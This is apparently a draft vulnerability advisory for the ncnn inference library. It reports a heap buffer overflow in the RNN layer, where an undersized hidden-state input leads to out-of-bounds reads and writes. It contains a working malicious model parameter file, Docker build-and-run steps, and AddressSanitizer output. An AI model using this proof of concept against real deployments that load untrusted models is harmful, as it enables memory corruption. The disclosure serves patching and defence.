All advisories
Draft

RNN Hidden-State Heap Buffer Overflow

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

RNN Hidden-State Heap Buffer Overflow

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/rnn.cpp:95 in rnn
Sanitizer verdict: heap-buffer-overflow

Summary

A model that wires a second, undersized input into an RNN layer makes ncnn read — and then write — num_output floats through a hidden-state buffer that contains fewer elements, so an attacker controls both how far past the allocation the layer runs and the values written there. ncnnoptimize inparam inbin outparam outbin 0 reaches it: the parameter file is loaded via Net::load_param and the graph is executed by ModelWriter::shape_inference(). The same code runs in Net-based inference whenever an untrusted model is loaded.

Detail

RNN::forward accepts an optional second bottom blob as the initial hidden state. When it is present the layer simply clones it, with no check that it carries num_output elements; when it is absent the layer allocates exactly num_output * num_directions floats. The kernel then unconditionally indexes the hidden state with num_output as its bound, both when reading it and when writing the new state back:

// src/layer/rnn.cpp:330
    Mat hidden;
    Allocator* hidden_allocator = top_blobs.size() == 2 ? opt.blob_allocator : opt.workspace_allocator;
    if (bottom_blobs.size() == 2)
    {
        hidden = bottom_blobs[1].clone(hidden_allocator);
    }
    else
    {
        hidden.create(num_output, num_directions, 4u, hidden_allocator);
        if (hidden.empty())
            return -100;
        hidden.fill(0.f);
    }

// src/layer/rnn.cpp:93
            for (int i = 0; i < num_output; i++)
            {
                H += weight_hc_ptr[i] * hidden_state[i];
            }

// src/layer/rnn.cpp:104
        #pragma omp parallel for num_threads(opt.num_threads)
        for (int q = 0; q < num_output; q++)
        {
            float H = gates[q];

            hidden_state[q] = H;
            output_data[q] = H;
        }

num_output comes from parameter field 0 of the RNN record; the hidden-state extent comes from a different layer's declared shape. Nothing reconciles them. The PoC declares Input hid 0 1 hid 0=1 — a one-element tensor — and RNN rnn 2 1 seq hid out 0=32 1=64 2=0, i.e. num_output = 32. bottom_blobs.size() == 2, so hidden is a clone of the one-float blob (Mat::clone at src/mat.cpp:79, visible in the allocation trace).

The inner loop at line 95 then evaluates hidden_state[i] for i in [0, 32) against that clone. Its backing allocation is 84 bytes (16-byte padded payload, 4-byte refcount, 64-byte NCNN_MALLOC_OVERREAD slack), so index 21 is the first read that clears the region — exactly the READ of size 4 ... 0 bytes after 84-byte region ASan reports. If the read is tolerated, the write-back loop at line 109 stores the computed gate value to hidden_state[q] for the same out-of-range indices, turning the over-read into an attacker-influenced heap write.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-rnn-hidden-state-heap-buffer-overflow && cd ncnn-poc-rnn-hidden-state-heap-buffer-overflow

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
3 3
Input seq 0 1 seq 0=2 1=1
Input hid 0 1 hid 0=1
RNN rnn 2 1 seq hid out 0=32 1=64
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000254 at pc 0x56b985768cf1 bp 0x7ffe89a157d0 sp 0x7ffe89a157c0
READ of size 4 at 0x50e000000254 thread T0
    #0 0x56b985768cf0 in rnn /ncnn/src/layer/rnn.cpp:95
    #1 0x56b98578e010 in ncnn::RNN::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/layer/rnn.cpp:362
    #2 0x56b981a8b70b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #3 0x56b981a73b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #4 0x56b981ad39e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #5 0x56b9819653c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #6 0x56b9819e2eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #7 0x76edd5d471c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x76edd5d4728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x56b981962624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e000000254 is located 0 bytes after 84-byte region [0x50e000000200,0x50e000000254)
allocated by thread T0 here:
    #0 0x76edd63c0f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x56b9819f768e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x56b9819f768e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x56b981a35621 in ncnn::Mat::create(int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:497
    #4 0x56b981a1bc14 in ncnn::Mat::clone(ncnn::Allocator*) const /ncnn/src/mat.cpp:79
    #5 0x56b985788714 in ncnn::RNN::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/layer/rnn.cpp:334
    #6 0x56b981a8b70b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #7 0x56b981a73b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #8 0x56b981ad39e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #9 0x56b9819653c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #10 0x56b9819e2eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #11 0x76edd5d471c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x76edd5d4728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #13 0x56b981962624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/rnn.cpp:95 in rnn

Credit

Zheng Yu @ DepthFirst